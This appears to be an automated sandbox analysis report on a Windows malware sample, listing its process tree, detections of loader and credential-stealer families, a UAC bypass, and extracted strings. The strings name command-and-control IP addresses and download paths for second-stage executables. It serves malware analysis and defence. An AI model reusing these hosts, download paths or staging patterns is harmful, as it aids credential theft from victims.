2024-04-27 00:20:51 UTC	16384	IN	Data Raw: 01 01 01 01 01 01 01 01 01 01 01 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 0e 1e 1e 0e 02 02 02 02 02 02 02 06 02 06 04 2b 3c 3c 3c 3c 2b 05 02 06 02 06 06 02 06 02 31 3c 31 1d 1d 31 3c 32 06 02 06 02 06 06 06 17 3c 2a 02 33 34 02 2c 3c 18 06 06 06 06 06 06 26 3c 0e 0a 35 36 06 0f 3c 28 06 06 06 06 06 06 2c 3c 09 06 33 36 06 09 3c 2c 06 06 06 06 0a 06 23 3c 20 0a 35 36 0a 20 3c 24 06 0a 06 0a 0a 0a 0d 39 39 13 33 36 13 39 39 11 0a 0a 0a 0a 0a 0a 0a 1b 3b 27 35 36 25 3b 1c 0a 0a 0a 06 0a 0a 0a 0a 0a 0f 1a 30 30 1a 12 0a 0a 0a 0a 0a 0a 0a 0a 0a 0c 0c 0c 22 22 0a 0a 0a 0a 0a 0c 0a 0c 0c 0c 0c 0a 0c 0a 39 39 0c 0c 0c 0c 0c 0a 0c 0c 0c 0c 0c 0c 0c 0c 15 15 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 00 00 00 00 Data Ascii: +<<<<+1<11<2<*34,<&<56<(,<36<,#< 56 <$993699;'56%;00""99
2024-04-27 00:20:51 UTC	16384	IN	Data Raw: fb ae 3a 9f 7d c6 3a 03 18 32 0c 00 84 da c0 fc f9 ea 78 f4 11 eb 8c 48 a9 d8 7a 6b 8d bc e8 62 c9 e3 15 b8 92 78 13 b0 5f 7c d3 2d 49 4a 36 37 6b cc d5 d7 28 96 c9 58 a7 44 ca b2 1b ae b7 4e 00 86 14 47 58 84 de b2 99 33 a5 5c d6 3a 23 52 aa 76 da 59 cd bc a0 08 18 94 c4 88 11 1a 7b dd f5 dc 5b 53 62 03 f3 df e7 8b 23 84 1e 03 00 a1 37 30 ff 7d b5 ff e6 37 d6 19 91 53 fd 95 5d d5 78 c6 99 d6 19 40 20 c5 6b 6a 35 76 e6 f5 4a 34 36 59 a7 44 ce d2 2b ae b0 4e 00 86 5c 82 cb 53 11 05 4b af bf 4e d5 5f dd 9d 6b 68 4b ac 76 ef 7d 94 eb ec d4 d2 2b 7e 69 9d 82 00 8a ea e7 53 ac b2 52 63 af bb 9e 47 eb 1a e8 9f 3b 57 1d 4f 3e 61 9d 01 0c 39 ce 00 20 12 b2 8b 17 ab ed c1 07 ac 33 22 a9 fe e0 43 54 7f c8 a1 d6 19 40 20 78 65 65 1a 7b f5 b5 4a ad b3 8e 75 4a 24 2d Data Ascii: :}:2xHzkbx_\|-IJ67k(XDNGX3\:#RvY{[Sb#70}7S]x@ kj5vJ46YD+N\SKN_khKv}+~iSRcG;WO>a9 3"CT@ xee{JuJ$-

Session ID	Source IP	Source Port	Destination IP	Destination Port
8	192.168.2.4	49770	20.9.155.145	443

Timestamp	Bytes transferred	Direction	Data
2024-04-27 00:21:16 UTC	209	OUT	POST /v2/track HTTP/1.1 Content-Type: application/x-json-stream Content-Encoding: gzip Host: westus2-2.in.applicationinsights.azure.com Content-Length: 850 Expect: 100-continue Connection: Keep-Alive

Target ID:	0
Start time:	02:18:55
Start date:	27/04/2024
Path:	C:\Users\user\Desktop\TNQTc6Qmkg.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\TNQTc6Qmkg.exe"
Imagebase:	0x400000
File size:	441'857 bytes
MD5 hash:	FCAC04FB67B3DEC2DB923867C5CB0701
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2972573005.0000000004265000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000003.2778288110.000000000720D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	02:19:00
Start date:	27/04/2024
Path:	C:\Users\user\AppData\Local\Temp\u3bs.0.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\u3bs.0.exe"
Imagebase:	0x400000
File size:	294'400 bytes
MD5 hash:	BB2810421305B969836433A1DFB11271
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.2974851008.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000001.00000002.2974851008.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000001.00000002.2974851008.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2975335845.000000000432A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000001.00000002.2975209039.0000000004314000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000003.1729816258.00000000042D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000001.00000003.1729816258.00000000042D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 39%, Virustotal, Browse
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	02:19:52
Start date:	27/04/2024
Path:	C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe"
Imagebase:	0x80000
File size:	2'469'936 bytes
MD5 hash:	9FB4770CED09AAE3B437C1C6EB6D7334
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs Detection: 0%, Virustotal, Browse
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	02:19:52
Start date:	27/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2595395304.00000000060B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.2595395304.00000000060B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	02:19:52
Start date:	27/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	02:20:11
Start date:	27/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://923204732243015979198396844819192998461207207524972816830460816/
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	02:20:12
Start date:	27/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1948,i,6675877024813103109,700328751344061810,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	02:20:17
Start date:	27/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Imagebase:	0x340000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	02:20:33
Start date:	27/04/2024
Path:	C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe"
Imagebase:	0x80000
File size:	2'469'936 bytes
MD5 hash:	9FB4770CED09AAE3B437C1C6EB6D7334
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	02:20:33
Start date:	27/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.2972244441.0000000005D80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000002.2972244441.0000000005D80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	02:20:34
Start date:	27/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	02:20:40
Start date:	27/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1948,i,6675877024813103109,700328751344061810,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	02:20:46
Start date:	27/04/2024
Path:	C:\Users\user\AppData\Local\Temp\u3bs.3.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\u3bs.3.exe"
Imagebase:	0x400000
File size:	4'866'096 bytes
MD5 hash:	397926927BCA55BE4A77839B1C44DE6E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000011.00000000.2777480035.0000000000401000.00000020.00000001.01000000.00000012.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe, Author: Joe Security
Antivirus matches:	Detection: 4%, ReversingLabs Detection: 3%, Virustotal, Browse
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	02:20:46
Start date:	27/04/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4312 -s 1392
Imagebase:	0x3f0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	22
Start time:	02:20:54
Start date:	27/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\HDBKJEGIEB.exe"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	02:20:54
Start date:	27/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	02:20:54
Start date:	27/04/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6808 -s 2360
Imagebase:	0x3f0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	26
Start time:	02:20:54
Start date:	27/04/2024
Path:	C:\Users\user\AppData\Local\Temp\HDBKJEGIEB.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\HDBKJEGIEB.exe"
Imagebase:	0xaa0000
File size:	545'792 bytes
MD5 hash:	6C93FC68E2F01C20FB81AF24470B790C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 47%, ReversingLabs Detection: 72%, Virustotal, Browse
Has exited:	false

Show Windows behavior

Target ID:	27
Start time:	02:20:57
Start date:	27/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Imagebase:	0xf70000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001B.00000002.2968147762.0000000001427000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	6%
Dynamic/Decrypted Code Coverage:	2.5%
Signature Coverage:	13.1%
Total number of Nodes:	1110
Total number of Limit Nodes:	16

Executed Functions

Function 0042676C Relevance: 51.9, APIs: 16, Strings: 13, Instructions: 1148
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00426771
WSAStartup.WS2_32(00000202,?), ref: 004273FD
socket.WS2_32(00000002,00000001,00000006), ref: 00427413
WSACleanup.WS2_32 ref: 0042742D
gethostbyname.WS2_32(00000000), ref: 00427441
htons.WS2_32(?), ref: 00427473
connect.WS2_32(00000000,?,00000010), ref: 00427484
send.WS2_32(00000000,00000000,00000000,00000000), ref: 004274A7
send.WS2_32(00000000,00000000,?,00000000), ref: 004274C3
recv.WS2_32(00000000,00000000,00000001,00000000), ref: 00427503
recv.WS2_32(?,00000000,00000001,00000000), ref: 00427681
recv.WS2_32(?,?,00000000,00000000), ref: 00427720
recv.WS2_32(?,0000000A,00000002,00000000), ref: 00427747
recv.WS2_32(00000000,?,?,00000000), ref: 004277A8
WSACleanup.WS2_32 ref: 004277E6
closesocket.WS2_32(?), ref: 004277ED

Strings

POST , xrefs: 00426AA7, 00426AD5, 00426B39
Content-Length, xrefs: 00426853, 004268ED, 004275AB
185.172.128.228, xrefs: 0042677C
HTTP/1.1, xrefs: 00426B5E, 00426BBC, 00426BD3
User-Agent: , xrefs: 00426C73, 00426CF5, 00426D0C
HTTP/1.1 200 OK, xrefs: 0042678D, 0042683A, 0042754B
chunked, xrefs: 004269E7, 00426A2D, 004275F8
(KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36, xrefs: 00427015, 0042729B, 004272B2
/ping.php?substr=%s, xrefs: 0042677D
Transfer-Encoding, xrefs: 0042690B, 004269C9, 004275E7
GET , xrefs: 00426AF5, 00426B17, 00426B31
Host: , xrefs: 00426BF2, 00426C2C, 00426C43
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 , xrefs: 00426D1E, 00426FEC, 00427003

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: recv$Cleanupsend$H_prologStartupclosesocketconnectgethostbynamehtonssocket
String ID: HTTP/1.1$(KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36$/ping.php?substr=%s$185.172.128.228$Content-Length$GET $HTTP/1.1 200 OK$Host: $Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 $POST $Transfer-Encoding$User-Agent: $chunked
API String ID: 791229064-1542616328
Opcode ID: f961f178ba84390bb4f0719f01a6f4fb8a549d420be4f1a9f2c07ca1afb26afe
Instruction ID: 4e55451fc037eb126e07087a8435dc815b4e607a9865e0499e256671a6cdd487
Opcode Fuzzy Hash: f961f178ba84390bb4f0719f01a6f4fb8a549d420be4f1a9f2c07ca1afb26afe
Instruction Fuzzy Hash: F39287209062E19ACB02FFB56C5659E7FF4591530D714747FE690AF393CB2C86088B9E

Uniqueness

Uniqueness Score: -1.00%

Function 00424A0E Relevance: 48.6, APIs: 2, Strings: 25, Instructions: 1388
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004265BC: __EH_prolog.LIBCMT ref: 004265C1

GetModuleFileNameA.KERNEL32(00000000,?,00000104,0043BEDC), ref: 00424AD4

Part of subcall function 0042604A: __EH_prolog.LIBCMT ref: 0042604F
Part of subcall function 0042604A: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00426131

Strings

\run.exe, xrefs: 00425BD0, 00425C28
185.172.128.228, xrefs: 004252C0, 00425366, 004254E5
P, xrefs: 00425B10
185.172.128.203, xrefs: 004255F7, 0042569D, 0042583F
185.172.128.59, xrefs: 0042553C, 004255D6, 0042584D
/ping.php?substr=%s, xrefs: 00425387, 0042545D, 00425475
P, xrefs: 004250AB
.exe, xrefs: 004258B1, 004258D3
.exe, xrefs: 00425F26, 00425F48
/BroomSetup.exe, xrefs: 00425DE7, 00425E8D, 00425EDB
SOFTWARE\BroomCleaner, xrefs: 004250F1, 004251E5
/cpa/ping.php?substr=%s&s=ab&sub=%s, xrefs: 00424DB6, 00424F4C, 00424F65
P, xrefs: 004254F5
/timeSync.exe, xrefs: 0042575F, 004257F2, 00425860
185.172.128.228, xrefs: 00425D21, 00425DCD, 00425ED2
note.padd.cn.com, xrefs: 00425942, 004259FA, 00425AFF
185.172.128.90, xrefs: 00424FB3, 0042504D, 0042509B
/1/Package.zip, xrefs: 00425A14, 00425AAE, 00425B08
eight, xrefs: 00424CE5, 00424D18
P, xrefs: 00425EE3
sub=([\w-]{1,255}), xrefs: 00424AA2
P, xrefs: 00425855
.zip, xrefs: 00425B5D, 00425B7F
/syncUpd.exe, xrefs: 004256BC, 0042573E, 0042586F
Installed, xrefs: 004251FF, 0042525D

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: H_prolog$FileIos_base_dtorModuleNamestd::ios_base::_
String ID: .exe$.exe$.zip$/1/Package.zip$/BroomSetup.exe$/cpa/ping.php?substr=%s&s=ab&sub=%s$/ping.php?substr=%s$/syncUpd.exe$/timeSync.exe$185.172.128.203$185.172.128.228$185.172.128.228$185.172.128.59$185.172.128.90$Installed$P$P$P$P$P$SOFTWARE\BroomCleaner$\run.exe$eight$note.padd.cn.com$sub=([\w-]{1,255})
API String ID: 2531350358-2497335110
Opcode ID: 0bb659f992b5b48d51668391017d10ba5611e103180bdbbf6b23a0de6bfd33c2
Instruction ID: d125a89a0ba1aec4cd60c53361ca74c042bcd3054cac0714d62587379a507679
Opcode Fuzzy Hash: 0bb659f992b5b48d51668391017d10ba5611e103180bdbbf6b23a0de6bfd33c2
Instruction Fuzzy Hash: EFB2131050A2E19AC712FB7958567CA2FE49B62309F54687FE7D01F2A3CB78460C87DE

Uniqueness

Uniqueness Score: -1.00%

Function 0042628B Relevance: 12.3, APIs: 8, Instructions: 275
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitialize.OLE32(00000000), ref: 004262AD
CoCreateInstance.OLE32(00429220,00000000,00000001,00429210,?,?,?,?,?,?,?,?,?,?,?,/ping.php?substr=%s), ref: 004262C7
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 00426309
SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00426311
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 00426338
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 0042634E
SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00426355
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00000000,?), ref: 0042637A

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: ByteCharMultiWide$AllocString$CreateInitializeInstance
String ID:
API String ID: 3070066007-0
Opcode ID: ce133915acab1118794e9b5cd677c6d3f7326e3d37cb49b767c5506a71b1f5aa
Instruction ID: 83f5cca910cad30c2957a1169f386ac85e7f4b82ddc6b65933772462ec616701
Opcode Fuzzy Hash: ce133915acab1118794e9b5cd677c6d3f7326e3d37cb49b767c5506a71b1f5aa
Instruction Fuzzy Hash: 3A914B75A00218AFDB04DFA8D888AEEBBB9FF49314F544559F805EB241D776AC02CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004139E7 Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00000003,?,004139BD,00000003,00438DB0,0000000C,00413B14,00000003,00000002,00000000,?,00412B6B,00000003), ref: 00413A08
TerminateProcess.KERNEL32(00000000,?,004139BD,00000003,00438DB0,0000000C,00413B14,00000003,00000002,00000000,?,00412B6B,00000003), ref: 00413A0F
ExitProcess.KERNEL32 ref: 00413A21

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 89ebcf6bc015773511dc3aad9cd82e24c556da80457bd1d22a03e0f024b4907b
Instruction ID: 8e17948dea93fcc861bafccf52e4138581932e64e8d8508709b4de54f2ab24c4
Opcode Fuzzy Hash: 89ebcf6bc015773511dc3aad9cd82e24c556da80457bd1d22a03e0f024b4907b
Instruction Fuzzy Hash: 83E0B631100108ABCF21AF65DD09A993B69EF54786F444029F9869A232DB39EE92CA48

Uniqueness

Uniqueness Score: -1.00%

Function 04265BD6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 04265BFE
Module32First.KERNEL32(00000000,00000224), ref: 04265C1E

Memory Dump Source

Source File: 00000000.00000002.2972573005.0000000004265000.00000040.00000020.00020000.00000000.sdmp, Offset: 04265000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4265000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: fe2ff150ffcf860bdd503148628e16cec70f7c1bf99ba9151d6964acf43553ff
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: A1F06231210711BBE7203AB9A88DB6E76ECAF49625F140568E647954C0DA70F8C54A61

Uniqueness

Uniqueness Score: -1.00%

Function 0041A242 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00419F10: CreateFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00419F2D

GetLastError.KERNEL32 ref: 0041A356
__dosmaperr.LIBCMT ref: 0041A35D
GetFileType.KERNEL32(00000000), ref: 0041A369
GetLastError.KERNEL32 ref: 0041A373
__dosmaperr.LIBCMT ref: 0041A37C
CloseHandle.KERNEL32(00000000), ref: 0041A39C
CloseHandle.KERNEL32(?), ref: 0041A4E6
GetLastError.KERNEL32 ref: 0041A518
__dosmaperr.LIBCMT ref: 0041A51F

Strings

H, xrefs: 0041A4A4

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 693600e6575519d5232ec394ac030b5dd81d70dd39d7e28a8c319a74ab69f910
Instruction ID: 6253cfc56dbab61e205766efb0611ca8061eb8c5ebbdbf8fd01913e42387971c
Opcode Fuzzy Hash: 693600e6575519d5232ec394ac030b5dd81d70dd39d7e28a8c319a74ab69f910
